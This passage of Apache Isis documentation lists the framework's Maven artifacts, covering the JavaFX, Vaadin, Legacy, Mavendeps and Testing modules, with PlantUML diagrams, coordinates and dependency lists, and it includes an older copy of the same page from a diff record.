+\no.a.i.incubator.viewer.javafx.ui.main.UiBuilderFx +\no.a.i.incubator.viewer.javafx.ui.main.UiContextFxDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.incubator.viewer:isis-viewer-javafx-model:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer JavaFX (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-javafx-viewer\nType: jar\nDirectory: \/incubator\/viewers\/javafx\/viewer\n----\n|.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-javafx-ui:jar:<managed> +\n****\n|===\n\n=== Vaadin Viewer\n\n[plantuml,Vaadin Viewer,svg]\n----\n@startuml(id=Vaadin_Viewer)\ntitle Vaadin Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Vaadin Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Inc - Viewer Vaadin\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Inc - Viewer Vaadin (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Inc - Viewer Vaadin (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Inc - Viewer Vaadin (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (Vaadin Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Inc - Viewer Vaadin\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin\nType: pom\nDirectory: \/incubator\/viewers\/vaadin\n----\n|Initial sketches\n\n|Apache Isis Inc - Viewer Vaadin (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-model\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/model\n----\n|.Dependencies\n****\ncom.github.fge:jackson-coreutils:jar:1.8 +\ncom.vaadin:vaadin:jar:<managed> +\nio.swagger:swagger-compat-spec-parser:jar:1.0.39 +\nio.swagger:swagger-parser:jar:1.0.39 +\nio.swagger.core.v3:swagger-core:jar:2.0.5 +\nio.swagger.core.v3:swagger-models:jar:2.0.5 +\nio.swagger.parser.v3:swagger-parser-core:jar:2.0.5 +\nio.swagger.parser.v3:swagger-parser-v3:jar:2.0.5 +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer Vaadin (UI Components)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-ui\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/ui\n----\n|.Components\n****\no.a.i.incubator.viewer.vaadin.ui.auth.LogoutHandlerVaa +\no.a.i.incubator.viewer.vaadin.ui.auth.VaadinAuthenticationHandler +\no.a.i.incubator.viewer.vaadin.ui.components.UiComponentFactoryVaa +\no.a.i.incubator.viewer.vaadin.ui.components.blob.BlobFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.clob.ClobFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.markup.MarkupFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.other.FallbackFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.temporal.TemporalFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.text.TextFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.components.text.uuid.UuidFieldFactory +\no.a.i.incubator.viewer.vaadin.ui.pages.main.UiActionHandlerVaa +\no.a.i.incubator.viewer.vaadin.ui.pages.main.UiContextVaaDefault +\n****\n\n.Dependencies\n****\ncom.vaadin:vaadin-spring:jar:<managed> +\ncommons-fileupload:commons-fileupload:jar:1.4 +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-model:jar:<managed> +\n****\n\n|Apache Isis Inc - Viewer Vaadin (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.incubator.viewer\nArtifact: isis-viewer-vaadin-viewer\nType: jar\nDirectory: \/incubator\/viewers\/vaadin\/viewer\n----\n|.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-ui:jar:<managed> +\n****\n|===\n\n== Legacy\n\n[plantuml,Legacy,svg]\n----\n@startuml(id=Legacy)\ntitle Legacy - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Legacy\\n[Software System]\" {\n rectangle \"==Apache Isis Legacy\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Legacy - Applib\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Legacy - Commons\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Legacy - Metamodel\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Legacy - REST Client\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Legacy - Runtime\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n@enduml\n----\n.Projects\/Modules (Legacy)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Legacy\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy\nType: pom\nDirectory: \/legacy\n----\n|Collection of deprecated Apache Isis functionality, for removal.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Legacy - Applib\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-applib\nType: jar\nDirectory: \/legacy\/extensions\/core\/applib\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Components\n****\no.a.i.legacy.applib.DomainObjectContainer +\n****\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - Commons\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-commons\nType: jar\nDirectory: \/legacy\/extensions\/core\/commons\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - Metamodel\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-metamodel\nType: jar\nDirectory: \/legacy\/extensions\/core\/metamodel\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.legacy:isis-legacy-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n|Apache Isis Legacy - REST Client\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-restclient\nType: jar\nDirectory: \/legacy\/mappings\/restclient\n----\n|As defined in Isis v1.x RO Applib.\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Legacy - Runtime\n[source,yaml]\n----\nGroup: org.apache.isis.legacy\nArtifact: isis-legacy-runtime\nType: jar\nDirectory: \/legacy\/extensions\/core\/runtime\n----\n|To ease migration from Apache Isis versions 1.16+ to 2.0.0.\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.legacy:isis-legacy-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n|===\n","old_contents":"= System Overview\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\nThese tables summarize all Maven artifacts available with _Apache Isis_.\n\n== App\n\n[plantuml,App,svg]\n----\n@startuml(id=App)\ntitle App - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"App\\n[Software System]\" {\n rectangle \"==Apache Isis Starter Parent\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (App)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Starter Parent\n[source,yaml]\n----\nGroup: org.apache.isis.app\nArtifact: isis-app-starter-parent\nType: pom\nDirectory: \/starters\n----\n|Parent pom providing dependency and plugin management for Apache Isis applications\nbuilt with Maven. Builds on top of spring-boot-starter-parent.\n|===\n\n== Mavendeps\n\n[plantuml,Mavendeps,svg]\n----\n@startuml(id=Mavendeps)\ntitle Mavendeps - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Mavendeps\\n[Software System]\" {\n rectangle \"==Apache Isis Maven Deps\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Maven Deps - BDD Integ Spec\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Maven Deps - Integration Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Maven Deps - JDK11\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Maven Deps - JDO\\n<size:10>[Container: packaging: pom]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Maven Deps - JPA\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Maven Deps - Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Maven Deps - Webapp\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 8 : \"\"\n2 .[#707070].> 9 : \"\"\n@enduml\n----\n.Projects\/Modules (Mavendeps)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Maven Deps\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps\nType: pom\nDirectory: \/mavendeps\n----\n|Collection of Apache Isis Maven Dependency Bundles.\n\n|Apache Isis Maven Deps - BDD Integ Spec\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-integspecs\nType: pom\nDirectory: \/mavendeps\/integspecs\n----\n|Defines a module that can be used as a single dependency for BDD (Cucumber) specs as integration tests.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-specsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Integration Testing\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-integtests\nType: pom\nDirectory: \/mavendeps\/integtests\n----\n|Defines a module that can be used as a single dependency for integration tests.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-integtestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - JDK11\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jdk11\nType: pom\nDirectory: \/mavendeps\/jdk11\n----\n|Defines a module to bring in dependencies that were part of JDK 8 but\nhad been removed with JDK 11+. These dependencies are activated when the\nconsuming project is built with JDK 11 or higher.\n\n|Apache Isis Maven Deps - JDO\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jdo\nType: pom\nDirectory: \/mavendeps\/jdo\n----\n|Defines a module that provides the default JDO persistence layer integration\nfor running an Apache Isis webapp (Wicket, Restful Objects and Shiro security).\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - JPA\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-jpa\nType: pom\nDirectory: \/mavendeps\/jpa\n----\n|Defines a module that provides the default JPA persistence layer integration\nfor running an Apache Isis webapp (Wicket, Restful Objects and Shiro security).\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-eclipselink:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Testing\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-unittests\nType: pom\nDirectory: \/mavendeps\/unittests\n----\n|Defines a module that can be used as a single dependency for a set of common testing libraries.\n\n.Dependencies\n****\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\n****\n\n|Apache Isis Maven Deps - Webapp\n[source,yaml]\n----\nGroup: org.apache.isis.mavendeps\nArtifact: isis-mavendeps-webapp\nType: pom\nDirectory: \/mavendeps\/webapp\n----\n|Defines a module that can be almost used as a single dependency for running\nan Apache Isis webapp (Wicket, Restful Objects and Shiro security).\n\nNote: Also requires a persistence provider.\n\n.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\norg.apache.isis.core:isis-schema:jar:<managed> +\norg.apache.isis.security:isis-security-bypass:jar:<managed> +\norg.apache.isis.security:isis-security-keycloak:jar:<managed> +\norg.apache.isis.security:isis-security-shiro:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-jaxrsresteasy4:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-viewer:jar:<managed> +\norg.springframework.boot:spring-boot-starter-tomcat:jar:<managed> +\norg.springframework.boot:spring-boot-starter-web:jar:<managed> +\n****\n|===\n\n== Testing\n\n[plantuml,Testing,svg]\n----\n@startuml(id=Testing)\ntitle Testing - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<13>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<14>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<15>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<16>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<17>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<18>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Testing\\n[Software System]\" {\n rectangle \"==Apache Isis Testing\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Tst - FakeData (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Tst - FakeData (fixtures)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Tst - FakeData (integ tests)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Tst - FakeData (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Tst - Fixtures (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Tst - Fixtures (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Tst - H2 Console (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Tst - H2 Console (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Tst - HSQLDB Manager\\n<size:10>[Container: packaging: jar]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Tst - HSQLDB Manager (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Tst - Integ Test Support (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<14>> as 14\n rectangle \"==Apache Isis Tst - Integ Test Support (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<13>> as 13\n rectangle \"==Apache Isis Tst - Spec\/Cucumber (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<16>> as 16\n rectangle \"==Apache Isis Tst - Spec\/Cucumber (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<15>> as 15\n rectangle \"==Apache Isis Tst - Unit Test Support (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<18>> as 18\n rectangle \"==Apache Isis Tst - Unit Test Support (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<17>> as 17\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 11 : \"\"\n2 .[#707070].> 13 : \"\"\n2 .[#707070].> 15 : \"\"\n2 .[#707070].> 17 : \"\"\n3 .[#707070].> 4 : \"\"\n3 .[#707070].> 5 : \"\"\n3 .[#707070].> 6 : \"\"\n7 .[#707070].> 8 : \"\"\n9 .[#707070].> 10 : \"\"\n11 .[#707070].> 12 : \"\"\n13 .[#707070].> 14 : \"\"\n15 .[#707070].> 16 : \"\"\n17 .[#707070].> 18 : \"\"\n@enduml\n----\n.Projects\/Modules (Testing)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Testing\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing\nType: pom\nDirectory: \/testing\n----\n|A library of utilities, mini-frameworks and tools for prototyping and testing Apache Isis applications.\n\n|Apache Isis Tst - FakeData (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata\nType: pom\nDirectory: \/testing\/fakedata\n----\n|A module providing a domain service to generate fake random data\nfor use in unit tests or integration tests.\n\n|Apache Isis Tst - FakeData (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-applib\nType: jar\nDirectory: \/testing\/fakedata\/applib\n----\n|.Components\n****\no.a.i.testing.fakedata.applib.services.FakeDataService +\n****\n\n.Dependencies\n****\ncom.github.javafaker:javafaker:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-unittestsupport-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:testing:index\/fakedata\/applib\/IsisModuleTestingFakeDataApplib.adoc[IsisModuleTestingFakeDataApplib], xref:refguide:testing:index\/fakedata\/applib\/services\/AbstractRandomValueGenerator.adoc[AbstractRandomValueGenerator], xref:refguide:testing:index\/fakedata\/applib\/services\/Addresses.adoc[Addresses], xref:refguide:testing:index\/fakedata\/applib\/services\/BigDecimals.adoc[BigDecimals], xref:refguide:testing:index\/fakedata\/applib\/services\/BigIntegers.adoc[BigIntegers], xref:refguide:testing:index\/fakedata\/applib\/services\/Books.adoc[Books], xref:refguide:testing:index\/fakedata\/applib\/services\/Booleans.adoc[Booleans], xref:refguide:testing:index\/fakedata\/applib\/services\/Bytes.adoc[Bytes], xref:refguide:testing:index\/fakedata\/applib\/services\/Chars.adoc[Chars], xref:refguide:testing:index\/fakedata\/applib\/services\/Collections.adoc[Collections], xref:refguide:testing:index\/fakedata\/applib\/services\/Comms.adoc[Comms], xref:refguide:testing:index\/fakedata\/applib\/services\/CreditCards.adoc[CreditCards], xref:refguide:testing:index\/fakedata\/applib\/services\/Doubles.adoc[Doubles], xref:refguide:testing:index\/fakedata\/applib\/services\/Enums.adoc[Enums], xref:refguide:testing:index\/fakedata\/applib\/services\/FakeDataService.adoc[FakeDataService], xref:refguide:testing:index\/fakedata\/applib\/services\/Floats.adoc[Floats], xref:refguide:testing:index\/fakedata\/applib\/services\/Integers.adoc[Integers], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisBlobs.adoc[IsisBlobs], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisClobs.adoc[IsisClobs], xref:refguide:testing:index\/fakedata\/applib\/services\/IsisPasswords.adoc[IsisPasswords], xref:refguide:testing:index\/fakedata\/applib\/services\/J8DateTimes.adoc[J8DateTimes], xref:refguide:testing:index\/fakedata\/applib\/services\/J8LocalDates.adoc[J8LocalDates], xref:refguide:testing:index\/fakedata\/applib\/services\/J8Periods.adoc[J8Periods], xref:refguide:testing:index\/fakedata\/applib\/services\/JavaSqlDates.adoc[JavaSqlDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JavaSqlTimestamps.adoc[JavaSqlTimestamps], xref:refguide:testing:index\/fakedata\/applib\/services\/JavaUtilDates.adoc[JavaUtilDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaDateTimes.adoc[JodaDateTimes], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaLocalDates.adoc[JodaLocalDates], xref:refguide:testing:index\/fakedata\/applib\/services\/JodaPeriods.adoc[JodaPeriods], xref:refguide:testing:index\/fakedata\/applib\/services\/Longs.adoc[Longs], xref:refguide:testing:index\/fakedata\/applib\/services\/Lorem.adoc[Lorem], xref:refguide:testing:index\/fakedata\/applib\/services\/Names.adoc[Names], xref:refguide:testing:index\/fakedata\/applib\/services\/Shorts.adoc[Shorts], xref:refguide:testing:index\/fakedata\/applib\/services\/Strings.adoc[Strings], xref:refguide:testing:index\/fakedata\/applib\/services\/Urls.adoc[Urls], xref:refguide:testing:index\/fakedata\/applib\/services\/Uuids.adoc[Uuids]\n****\n\n|Apache Isis Tst - FakeData (fixtures)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-fixtures\nType: jar\nDirectory: \/testing\/fakedata\/fixtures\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fixtures-applib:jar:<managed> +\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Tst - FakeData (integ tests)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: isis-testing-fakedata-integtests\nType: jar\nDirectory: \/testing\/fakedata\/integtests\n----\n|.Dependencies\n****\norg.apache.isis.mavendeps:isis-mavendeps-integtests:pom:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-datanucleus:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-applib:jar:<managed> +\norg.apache.isis.testing:isis-testing-fakedata-fixtures:jar:<managed> +\n****\n\n|Apache Isis Tst - Fixtures (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.testing\nArtifact: 